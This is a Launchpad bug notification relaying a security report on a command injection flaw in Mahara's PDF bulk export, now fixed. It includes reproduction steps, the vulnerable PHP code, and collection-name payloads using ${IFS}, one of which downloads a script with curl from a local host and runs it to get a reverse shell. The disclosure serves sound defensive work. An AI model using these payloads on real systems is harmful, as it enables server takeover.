** Changed in: mahara/21.04
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: mahara-contributors
https://bugs.launchpad.net/bugs/1942903
Title:
Command injection vulnerability when PDF bulk export is enabled
Status in Mahara:
Fix Released
Status in Mahara 20.04 series:
Fix Released
Status in Mahara 20.10 series:
Fix Released
Status in Mahara 21.04 series:
Fix Released
Bug description:
Hi team, I hope you're doing well! When the experimental PDF export
feature is enabled, a user can craft a malicious collection in Mahara
and trigger the command injection issue when an admin exports the
attacker's data (either specifically or by exporting the institution
the attacker belongs to).
This was tested yesterday (2021-09-06) using the docker-compose file
in the master branch of
https://git.mahara.org/mahara/mahara/-/tree/master/docker
## Steps To Reproduce:
URLs will be using `http://localhost:6142/mahara/` as that's my local
instance's URL. Modify the base URL to fit your environment.
### Setup
1. Login as administrator
2. Go to the Plugin Administration page
`http://localhost:6142/mahara/admin/extensions/plugins.php` and enable PDF at
the bottom right of the page (installing some prerequisites on the server might
be necessary, the plugins page should have instructions)
### Exploitation
1. As the attacker (normal user account), create a collection named
`;sleep${IFS}100;`
2. As the administrator go to the bulk export page
`http://localhost:6142/mahara/admin/users/bulkexport.php`
3. Choose `PDF files of pages and collections` as the export format
4. Set the attacker's username in `Usernames to export`
5. Click `Export Accounts` and observe the 100 seconds delay in processing
See the following section for a reverse shell example
## Details
The issue comes from
https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/pdf/lib.php#L298
```php
$collectionname =
$this->collections[$collectionid]->get('name');
$collectionname = parent::text_to_filename($collectionname);
if ($combiner == 'pdfunite') {
exec('pdfunite ' . implode(' ', $collection) . ' ' .
$pdfdirectory . '/' . $collectionid . '_' . $collectionname . '.pdf', $output);
}
```
`$collectionname` is user controlled and the sanitization allows just
enough characters to be able to inject commands
https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/html/lib.php#L372-L375
```php
public static function text_to_filename($text) {
// truncates the text and replaces NOT allowed characters to hyphens
return preg_replace('#["()*/:<>?\\| ]+#', '-', mb_substr($text, 0,
parent::MAX_FILENAME_LENGTH, 'utf-8'));
}
```
In the attached video the malicious collection name is
```bash
;cd$IFS`mktemp$IFS-d`;curl${IFS}192.168.1.75$IFS-o${IFS}a.sh;bash${IFS}a.sh;
```
and it triggered a reverse shell, see attached video. Note that I had
to install curl on my server to make it work, but that's likely to be
present on a real system.
Suggested CVSS: AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 8.0
`AC:H` because of the setting that's likely to be disabled, `PR:L`
because the payload is injected as a regular user, `UI:R` as it's
triggered by an admin export, `S:C` as it impact everything on the
server once a reverse shell is obtained.
Let me know if you need anything else!
Dominic
To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1942903/+subscriptions
_______________________________________________
Mailing list: https://launchpad.net/~mahara-contributors
Post to : mahara-contributors@lists.launchpad.net
Unsubscribe : https://launchpad.net/~mahara-contributors
More help : https://help.launchpad.net/ListHelp
